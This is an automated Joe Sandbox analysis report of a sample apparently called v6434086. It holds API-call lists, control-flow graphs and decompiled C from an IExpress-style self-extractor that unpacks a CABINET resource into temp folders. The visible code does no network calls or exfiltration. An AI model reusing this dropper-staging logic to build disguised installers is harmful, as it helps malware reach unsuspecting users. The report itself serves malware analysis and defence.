                                                                                                                                                                                                        0x00bc5830
                                                                                                                                                                                                        0x00bc5836
                                                                                                                                                                                                        0x00bc583d
                                                                                                                                                                                                        0x00bc584b
                                                                                                                                                                                                        0x00bc5851
                                                                                                                                                                                                        0x00bc5855
                                                                                                                                                                                                        0x00bc585a
                                                                                                                                                                                                        0x00bc585c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc585e
                                                                                                                                                                                                        0x00bc585e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc585e
                                                                                                                                                                                                        0x00bc5811
                                                                                                                                                                                                        0x00bc5817
                                                                                                                                                                                                        0x00bc5819
                                                                                                                                                                                                        0x00bc581f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc581f
                                                                                                                                                                                                        0x00bc5791
                                                                                                                                                                                                        0x00bc5797
                                                                                                                                                                                                        0x00bc579c
                                                                                                                                                                                                        0x00bc579e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc57a0
                                                                                                                                                                                                        0x00bc57a9
                                                                                                                                                                                                        0x00bc57ae
                                                                                                                                                                                                        0x00bc57b0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc57b0
                                                                                                                                                                                                        0x00bc579e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5769
                                                                                                                                                                                                        0x00bc5762
                                                                                                                                                                                                        0x00bc5753
                                                                                                                                                                                                        0x00bc574f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc572e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5864
                                                                                                                                                                                                        0x00bc5864
                                                                                                                                                                                                        0x00bc5864
                                                                                                                                                                                                        0x00bc5717
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc56c3
                                                                                                                                                                                                        0x00bc56c5
                                                                                                                                                                                                        0x00bc56c9
                                                                                                                                                                                                        0x00bc56ce
                                                                                                                                                                                                        0x00bc56d0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc56d6
                                                                                                                                                                                                        0x00bc56d6
                                                                                                                                                                                                        0x00bc56d8
                                                                                                                                                                                                        0x00bc56dd
                                                                                                                                                                                                        0x00bc56df
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc56e1
                                                                                                                                                                                                        0x00bc56e2
                                                                                                                                                                                                        0x00bc56e4
                                                                                                                                                                                                        0x00bc56e6
                                                                                                                                                                                                        0x00bc56eb
                                                                                                                                                                                                        0x00bc56ed
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc56f3
                                                                                                                                                                                                        0x00bc56f3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc586c
                                                                                                                                                                                                        0x00bc5878
                                                                                                                                                                                                        0x00bc587e
                                                                                                                                                                                                        0x00bc5882
                                                                                                                                                                                                        0x00bc5883
                                                                                                                                                                                                        0x00bc5889
                                                                                                                                                                                                        0x00bc588e
                                                                                                                                                                                                        0x00bc588e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5896
                                                                                                                                                                                                        0x00bc56ed
                                                                                                                                                                                                        0x00bc56df
                                                                                                                                                                                                        0x00bc56d0
                                                                                                                                                                                                        0x00bc56c1
                                                                                                                                                                                                        0x00bc56a8
                                                                                                                                                                                                        0x00bc565b
                                                                                                                                                                                                        0x00bc565b
                                                                                                                                                                                                        0x00bc565d
                                                                                                                                                                                                        0x00bc5669
                                                                                                                                                                                                        0x00bc5669
                                                                                                                                                                                                        0x00bc565f
                                                                                                                                                                                                        0x00bc565f
                                                                                                                                                                                                        0x00bc5665
                                                                                                                                                                                                        0x00bc5667
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5667
                                                                                                                                                                                                        0x00bc566c
                                                                                                                                                                                                        0x00bc5673
                                                                                                                                                                                                        0x00bc5678
                                                                                                                                                                                                        0x00bc567a
                                                                                                                                                                                                        0x00bc589b
                                                                                                                                                                                                        0x00bc589b
                                                                                                                                                                                                        0x00bc5680
                                                                                                                                                                                                        0x00bc5685
                                                                                                                                                                                                        0x00bc568c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc568c
                                                                                                                                                                                                        0x00bc567a
                                                                                                                                                                                                        0x00bc560e
                                                                                                                                                                                                        0x00bc5613
                                                                                                                                                                                                        0x00bc561a
                                                                                                                                                                                                        0x00bc5620
                                                                                                                                                                                                        0x00bc5626
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5626
                                                                                                                                                                                                        0x00bc55db
                                                                                                                                                                                                        0x00bc55e0
                                                                                                                                                                                                        0x00bc55e7
                                                                                                                                                                                                        0x00bc55f1
                                                                                                                                                                                                        0x00bc55f6
                                                                                                                                                                                                        0x00bc55f6
                                                                                                                                                                                                        0x00bc55f6
                                                                                                                                                                                                        0x00bc58b7
                                                                                                                                                                                                        0x00bc58c7

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00BC46A0
                                                                                                                                                                                                          • Part of subcall function 00BC468F: SizeofResource.KERNEL32(00000000,00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46A9
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00BC46C3
                                                                                                                                                                                                          • Part of subcall function 00BC468F: LoadResource.KERNEL32(00000000,00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46CC
                                                                                                                                                                                                          • Part of subcall function 00BC468F: LockResource.KERNEL32(00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46D3
                                                                                                                                                                                                          • Part of subcall function 00BC468F: memcpy_s.MSVCRT ref: 00BC46E5
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00BC55CF
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00BC5638
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00BC564C
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00BC5620
                                                                                                                                                                                                          • Part of subcall function 00BC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00BC4518
                                                                                                                                                                                                          • Part of subcall function 00BC44B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00BC4554
                                                                                                                                                                                                          • Part of subcall function 00BC6285: GetLastError.KERNEL32(00BC5BBC), ref: 00BC6285
                                                                                                                                                                                                        • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00BC56B9
                                                                                                                                                                                                        • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00BC571E
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00BC5737
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00BC57CD
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00BC57EF
                                                                                                                                                                                                        • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00BC5802
                                                                                                                                                                                                          • Part of subcall function 00BC2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00BC2654
                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00BC5830
                                                                                                                                                                                                          • Part of subcall function 00BC6517: FindResourceA.KERNEL32(00BC0000,000007D6,00000005), ref: 00BC652A
                                                                                                                                                                                                          • Part of subcall function 00BC6517: LoadResource.KERNEL32(00BC0000,00000000,?,?,00BC2EE8,00000000,00BC19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00BC6538
                                                                                                                                                                                                          • Part of subcall function 00BC6517: DialogBoxIndirectParamA.USER32(00BC0000,00000000,00000547,00BC19E0,00000000), ref: 00BC6557
                                                                                                                                                                                                          • Part of subcall function 00BC6517: FreeResource.KERNEL32(00000000,?,?,00BC2EE8,00000000,00BC19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00BC6560
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00BC5878
                                                                                                                                                                                                          • Part of subcall function 00BC597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00BC59A8
                                                                                                                                                                                                          • Part of subcall function 00BC597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00BC59AF
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                        • API String ID: 2436801531-3708386018
                                                                                                                                                                                                        • Opcode ID: 741a11153c94a07b17648c2733ef2dd035aacda32bc076d935972dcea3d95e9d
                                                                                                                                                                                                        • Instruction ID: 2474df7549ab6fba4ba1e021644ce5e4f5fb7bad5ae3da80fa9e21889b2aad5b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 741a11153c94a07b17648c2733ef2dd035aacda32bc076d935972dcea3d95e9d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C811871A04A089ADB34AB758C85FEE72EDDB65344F0400EEF586E3191DF74AEC18A60
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC597D Relevance: 19.7, APIs: 13, Instructions: 212windowCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 324 bc597d-bc59b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 bc59dd-bc5a1b GetDiskFreeSpaceA 324->325 326 bc59bb-bc59d8 call bc44b9 call bc6285 324->326 327 bc5ba1-bc5bde memset call bc6285 GetLastError FormatMessageA 325->327 328 bc5a21-bc5a4a MulDiv 325->328 341 bc5c05-bc5c14 call bc6ce0 326->341 338 bc5be3-bc5bfc call bc44b9 SetCurrentDirectoryA 327->338 328->327 331 bc5a50-bc5a6c GetVolumeInformationA 328->331 334 bc5a6e-bc5ab0 memset call bc6285 GetLastError FormatMessageA 331->334 335 bc5ab5-bc5aca SetCurrentDirectoryA 331->335 334->338 340 bc5acc-bc5ad1 335->340 351 bc5c02 338->351 344 bc5ae2-bc5ae4 340->344 345 bc5ad3-bc5ad8 340->345 349 bc5ae6 344->349 350 bc5ae7-bc5af8 344->350 345->344 347 bc5ada-bc5ae0 345->347 347->340 347->344 349->350 353 bc5af9-bc5afb 350->353 354 bc5c04 351->354 355 bc5afd-bc5b03 353->355 356 bc5b05-bc5b08 353->356 354->341 355->353 355->356 357 bc5b0a-bc5b1b call bc44b9 356->357 358 bc5b20-bc5b27 356->358 357->351 360 bc5b29-bc5b33 358->360 361 bc5b52-bc5b5b 358->361 360->361 363 bc5b35-bc5b50 360->363 364 bc5b62-bc5b6d 361->364 363->364 365 bc5b6f-bc5b74 364->365 366 bc5b76-bc5b7d 364->366 367 bc5b85 365->367 368 bc5b7f-bc5b81 366->368 369 bc5b83 366->369 370 bc5b96-bc5b9f 367->370 371 bc5b87-bc5b94 call bc268b 367->371 368->367 369->367 370->354 371->354
                                                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                                                        			E00BC597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v16;
				char _v276;
				char _v788;
				long _v792;
				long _v796;
				long _v800;
				signed int _v804;
				long _v808;
				int _v812;
				long _v816;
				long _v820;
				void* __ebx;
				void* __esi;
				signed int _t46;
				int _t50;
				signed int _t55;
				void* _t66;
				int _t69;
				signed int _t73;
				signed short _t78;
				signed int _t87;
				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0xbc8004; // 0x9f7d84ca
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0xbc9124 = E00BC6285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E00BC44B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0xbc9a34 & 0x00000008;
							if(( *0xbc9a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0xbc9a38; // 0x0
								_t110 =  *((intOrPtr*)(0xbc89e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0xbc9124 = 0;
									_t66 = 1;
								} else {
									_t66 = E00BC268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0xbc9a38; // 0x0
							_t110 =  *((intOrPtr*)(0xbc89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xbc89e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0xbc9a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E00BC44B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset( &_v788, 0, 0x200);
					 *0xbc9124 = E00BC6285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
					_t110 = 0x4f9;
					goto L30;
				} else {
					_t110 = 0x4bc;
					E00BC44B9(0, 0x4bc, 0, 0, 0x10, 0);
					 *0xbc9124 = E00BC6285();
					_t66 = 0;
					L33:
					return E00BC6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
				}
			}



































                                                                                                                                                                                                        0x00bc597d
                                                                                                                                                                                                        0x00bc5988
                                                                                                                                                                                                        0x00bc598f
                                                                                                                                                                                                        0x00bc599a
                                                                                                                                                                                                        0x00bc59a6
                                                                                                                                                                                                        0x00bc59a8
                                                                                                                                                                                                        0x00bc59af
                                                                                                                                                                                                        0x00bc59b9
                                                                                                                                                                                                        0x00bc59dd
                                                                                                                                                                                                        0x00bc59e4
                                                                                                                                                                                                        0x00bc59f1
                                                                                                                                                                                                        0x00bc59fe
                                                                                                                                                                                                        0x00bc5a0b
                                                                                                                                                                                                        0x00bc5a13
                                                                                                                                                                                                        0x00bc5a19
                                                                                                                                                                                                        0x00bc5a1b
                                                                                                                                                                                                        0x00bc5ba1
                                                                                                                                                                                                        0x00bc5baf
                                                                                                                                                                                                        0x00bc5bbd
                                                                                                                                                                                                        0x00bc5bd8
                                                                                                                                                                                                        0x00bc5bde
                                                                                                                                                                                                        0x00bc5be3
                                                                                                                                                                                                        0x00bc5bec
                                                                                                                                                                                                        0x00bc5bf0
                                                                                                                                                                                                        0x00bc5bfc
                                                                                                                                                                                                        0x00bc5c02
                                                                                                                                                                                                        0x00bc5c02
                                                                                                                                                                                                        0x00bc5c02
                                                                                                                                                                                                        0x00bc5c04
                                                                                                                                                                                                        0x00bc5c04
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5c04
                                                                                                                                                                                                        0x00bc5a27
                                                                                                                                                                                                        0x00bc5a3a
                                                                                                                                                                                                        0x00bc5a46
                                                                                                                                                                                                        0x00bc5a48
                                                                                                                                                                                                        0x00bc5a4a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5a64
                                                                                                                                                                                                        0x00bc5a6a
                                                                                                                                                                                                        0x00bc5a6c
                                                                                                                                                                                                        0x00bc5abc
                                                                                                                                                                                                        0x00bc5ac2
                                                                                                                                                                                                        0x00bc5ac9
                                                                                                                                                                                                        0x00bc5aca
                                                                                                                                                                                                        0x00bc5aca
                                                                                                                                                                                                        0x00bc5acc
                                                                                                                                                                                                        0x00bc5acc
                                                                                                                                                                                                        0x00bc5acf
                                                                                                                                                                                                        0x00bc5ad1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5ad3
                                                                                                                                                                                                        0x00bc5ad6
                                                                                                                                                                                                        0x00bc5ad8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5ada
                                                                                                                                                                                                        0x00bc5adc
                                                                                                                                                                                                        0x00bc5add
                                                                                                                                                                                                        0x00bc5add
                                                                                                                                                                                                        0x00bc5ae0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5ae0
                                                                                                                                                                                                        0x00bc5ae2
                                                                                                                                                                                                        0x00bc5ae4
                                                                                                                                                                                                        0x00bc5ae6
                                                                                                                                                                                                        0x00bc5ae6
                                                                                                                                                                                                        0x00bc5ae6
                                                                                                                                                                                                        0x00bc5ae9
                                                                                                                                                                                                        0x00bc5aeb
                                                                                                                                                                                                        0x00bc5af0
                                                                                                                                                                                                        0x00bc5af6
                                                                                                                                                                                                        0x00bc5af8
                                                                                                                                                                                                        0x00bc5af9
                                                                                                                                                                                                        0x00bc5af9
                                                                                                                                                                                                        0x00bc5afb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5afd
                                                                                                                                                                                                        0x00bc5aff
                                                                                                                                                                                                        0x00bc5b00
                                                                                                                                                                                                        0x00bc5b03
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5b03
                                                                                                                                                                                                        0x00bc5b05
                                                                                                                                                                                                        0x00bc5b08
                                                                                                                                                                                                        0x00bc5b20
                                                                                                                                                                                                        0x00bc5b27
                                                                                                                                                                                                        0x00bc5b52
                                                                                                                                                                                                        0x00bc5b52
                                                                                                                                                                                                        0x00bc5b5b
                                                                                                                                                                                                        0x00bc5b62
                                                                                                                                                                                                        0x00bc5b6b
                                                                                                                                                                                                        0x00bc5b6d
                                                                                                                                                                                                        0x00bc5b76
                                                                                                                                                                                                        0x00bc5b7d
                                                                                                                                                                                                        0x00bc5b83
                                                                                                                                                                                                        0x00bc5b7f
                                                                                                                                                                                                        0x00bc5b7f
                                                                                                                                                                                                        0x00bc5b7f
                                                                                                                                                                                                        0x00bc5b6f
                                                                                                                                                                                                        0x00bc5b72
                                                                                                                                                                                                        0x00bc5b72
                                                                                                                                                                                                        0x00bc5b85
                                                                                                                                                                                                        0x00bc5b98
                                                                                                                                                                                                        0x00bc5b9e
                                                                                                                                                                                                        0x00bc5b87
                                                                                                                                                                                                        0x00bc5b8f
                                                                                                                                                                                                        0x00bc5b8f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5b85
                                                                                                                                                                                                        0x00bc5b29
                                                                                                                                                                                                        0x00bc5b33
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5b35
                                                                                                                                                                                                        0x00bc5b48
                                                                                                                                                                                                        0x00bc5b4a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5b4a
                                                                                                                                                                                                        0x00bc5b0f
                                                                                                                                                                                                        0x00bc5b16
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5b16
                                                                                                                                                                                                        0x00bc5a7c
                                                                                                                                                                                                        0x00bc5a8a
                                                                                                                                                                                                        0x00bc5aa5
                                                                                                                                                                                                        0x00bc5aab
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc59bb
                                                                                                                                                                                                        0x00bc59c0
                                                                                                                                                                                                        0x00bc59c7
                                                                                                                                                                                                        0x00bc59d1
                                                                                                                                                                                                        0x00bc59d6
                                                                                                                                                                                                        0x00bc5c05
                                                                                                                                                                                                        0x00bc5c14
                                                                                                                                                                                                        0x00bc5c14

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00BC59A8
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(?), ref: 00BC59AF
                                                                                                                                                                                                        • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00BC5A13
                                                                                                                                                                                                        • MulDiv.KERNEL32(?,?,00000400), ref: 00BC5A40
                                                                                                                                                                                                        • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00BC5A64
                                                                                                                                                                                                        • memset.MSVCRT ref: 00BC5A7C
                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00BC5A98
                                                                                                                                                                                                        • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00BC5AA5
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00BC5BFC
                                                                                                                                                                                                          • Part of subcall function 00BC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00BC4518
                                                                                                                                                                                                          • Part of subcall function 00BC44B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00BC4554
                                                                                                                                                                                                          • Part of subcall function 00BC6285: GetLastError.KERNEL32(00BC5BBC), ref: 00BC6285
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 4237285672-0
                                                                                                                                                                                                        • Opcode ID: 548b99771bf7991052ecc27732bacce4e8ac91beb27cca252114aac771798730
                                                                                                                                                                                                        • Instruction ID: 56f3da5d2495791e8e6881032edd7e8aab9009284eda94b6bd01743c63a42c2f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 548b99771bf7991052ecc27732bacce4e8ac91beb27cca252114aac771798730
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6E715DB1A0060CABEB259F64CC89FEB77ECEB4C344F5441EDF54597140EA74AE858B60
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC4FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121windowCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 374 bc4fe0-bc501a call bc468f FindResourceA LoadResource LockResource 377 bc5020-bc5027 374->377 378 bc5161-bc5163 374->378 379 bc5029-bc5051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->379 380 bc5057-bc505e call bc4efd 377->380 379->380 383 bc507c-bc50b4 380->383 384 bc5060-bc5077 call bc44b9 380->384 389 bc50e8-bc5104 call bc44b9 383->389 390 bc50b6-bc50da 383->390 388 bc5107-bc510e 384->388 392 bc511d-bc511f 388->392 393 bc5110-bc5117 FreeResource 388->393 402 bc5106 389->402 401 bc50dc 390->401 390->402 394 bc513a-bc5141 392->394 395 bc5121-bc5127 392->395 393->392 399 bc515f 394->399 400 bc5143-bc514a 394->400 395->394 398 bc5129-bc5135 call bc44b9 395->398 398->394 399->378 400->399 404 bc514c-bc5159 SendMessageA 400->404 405 bc50e3-bc50e6 401->405 402->388 404->399 405->389 405->402
                                                                                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                                                                                        			E00BC4FE0(void* __edi, void* __eflags) {
				void* __ebx;
				void* _t8;
				struct HWND__* _t9;
				int _t10;
				void* _t12;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t29;
				void* _t33;
				int _t34;
				CHAR* _t36;
				int _t37;
				intOrPtr _t47;

				_t33 = __edi;
				_t36 = "CABINET";
				 *0xbc9144 = E00BC468F(_t36, 0, 0);
				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
				 *0xbc9140 = _t8;
				if(_t8 == 0) {
					return _t8;
				}
				_t9 =  *0xbc8584; // 0x0
				if(_t9 != 0) {
					ShowWindow(GetDlgItem(_t9, 0x842), 0);
					ShowWindow(GetDlgItem( *0xbc8584, 0x841), 5);
				}
				_t10 = E00BC4EFD(0, 0);
				if(_t10 != 0) {
					__imp__#20(E00BC4CA0, E00BC4CC0, E00BC4980, E00BC4A50, E00BC4AD0, E00BC4B60, E00BC4BC0, 1, 0xbc9148, _t33);
					_t34 = _t10;
					if(_t34 == 0) {
						L8:
						_t29 =  *0xbc9148; // 0x0
						_t24 =  *0xbc8584; // 0x0
